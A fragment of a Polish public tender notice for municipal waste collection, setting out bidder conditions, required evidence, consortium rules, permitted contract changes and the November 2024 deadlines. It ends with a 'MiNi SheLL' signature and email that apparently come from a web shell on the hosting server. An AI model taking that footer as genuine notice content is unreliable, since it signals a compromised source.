technicznej i zawodowej:<br/><br/>O udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, że należycie wykonał lub wykonuje w okresie ostatnich 3 lat liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>• dla części I przedmiotu zamówienia - co najmniej jedno zamówienie o wartości co najmniej 100.000,00 zł brutto (słownie: sto tysięcy złotych 00/100), którego przedmiotem była lub jest usługa odbioru i zagospodarowania odpadów komunalnych na rzecz właścicieli nieruchomości, trwające minimum kolejnych 6 miesięcy, <br/>• dla części II przedmiotu zamówienia - co najmniej jedno zamówienie o wartości co najmniej 100.000,00 zł brutto (słownie: sto tysięcy złotych 00/100), którego przedmiotem była lub jest usługa odbioru i zagospodarowania odpadów komunalnych na rzecz właścicieli nieruchomości, trwające minimum kolejnych 6 miesięcy.<br/>W przypadku składania oferty na obie części zamówienia, Wykonawca spełni warunek, jeżeli wykaże, że należycie wykonał lub wykonuje co najmniej jedno zamówienie o wartości co najmniej 100.000,00 zł brutto (słownie: sto tysięcy złotych 00/100), którego przedmiotem była lub jest usługa odbioru i zagospodarowania odpadów komunalnych na rzecz właścicieli nieruchomości, trwające minimum kolejnych 6 miesięcy.<br/>W przypadku wykazania przez Wykonawcę usług trwających, dotychczasowy okres trwania usługi nie może być krótszy niż 6 miesięcy i wartość wykonanej dotychczas usługi nie może być mniejsza niż 100.000,00 zł brutto.<br/>Sposób spełniania ww. warunku udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia został określony w rozdziale III SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>2) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/><br/>3) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108 ust. 1 pkt 3, 4, 5 i 6 ustawy PZP, a także w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) potwierdzenie wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o którym mowa w art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2024 r. poz. 399), zgodnie z warunkiem postawionym w SWZ w rozdziale III ust. 2 pkt 1);<br/><br/>2) wykaz usług wykonanych lub w przypadku usług okresowych lub ciągłych wykonywanych, w okresie ostatnich 3 lat liczonych wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, z załączeniem dowodów określających czy usługi te zostały wykonane lub są wykonywane należycie;<br/><br/>3) polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W niniejszym postępowaniu Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) pełnomocnictwo - wymagane, jeżeli ofertę w postępowaniu składa w imieniu Wykonawcy pełnomocnik. Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego;<br/><br/>2) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/><br/>3) oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy);<br/><br/>4) zobowiązanie podmiotu udostępniającego zasoby - jeżeli dotyczy;<br/><br/>5) oświadczenie podmiotu udostępniającego zasoby składane na podstawie art. 125 ust. 5 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych - jeżeli dotyczy;<br/><br/>Wymagane oświadczenia i dokumenty zostały wskazane w SWZ i załącznikach do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy (lider konsorcjum).<br/>2) Pełnomocnictwo dla lidera konsorcjum, o którym mowa powyżej, powinno zostać przekazane wraz z ofertą wspólną Wykonawców.<br/>3) Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za wiążące dla wszystkich Wykonawców składających ofertę wspólną.<br/>4) Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną.<br/>6) W przypadku wspólnego ubiegania się przez Wykonawców o zamówienie, należy złożyć jeden wspólny formularz ofertowy, sporządzony według wzoru stanowiącego załącznik nr 2 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Postanowienia dot. zmian umowy wskazane zostały w projektowanych postanowieniach umowy, które stanowią załączniki nr 5A i 5B do SWZ.<br/><br/>Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego Wykonawcy, o którym mowa w § 6 ust. 1 i 2 umowy, w formie pisemnego aneksu, każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:<br/>a) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2020 r. poz. 2207 ze zm.),<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2024 r. poz. 427),<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę.<br/><br/>Na podstawie art. 439 ustawy PZP, Strony dopuszczają możliwość zmiany wynagrodzenia należnego Wykonawcy, o którym mowa w § 6 ust. 1 umowy, tj. poprzez zmianę wysokości wynagrodzenia miesięcznego, o którym mowa w § 6 ust. 2 umowy - w przypadku zmiany kosztów związanych z realizacją zamówienia. Przez zmianę kosztów rozumie się zarówno ich wzrost, jak i obniżenie - względem kosztów przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie.<br/><br/>Postanowienia i warunki w zakresie zmian umowy zostały szczegółowo opisane w dokumentach zamówienia, w szczególności w § 10 załącznika nr 5A i 5B do SWZ (projektowane postanowienia umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com